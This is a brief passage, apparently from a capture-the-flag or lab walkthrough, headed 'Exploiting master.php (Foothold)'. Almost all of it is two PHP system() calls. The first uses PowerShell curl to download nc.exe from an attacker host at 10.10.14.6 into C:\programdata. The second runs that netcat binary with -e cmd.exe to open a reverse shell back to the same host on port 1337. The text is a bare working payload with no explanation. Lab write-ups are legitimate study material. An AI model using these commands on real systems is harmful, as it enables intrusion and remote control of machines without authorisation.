Exploiting master.php (Foothold)

system("powershell -c curl http://10.10.14.6/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe -e cmd.exe 10.10.14.6 1337");

Last updated

Was this helpful?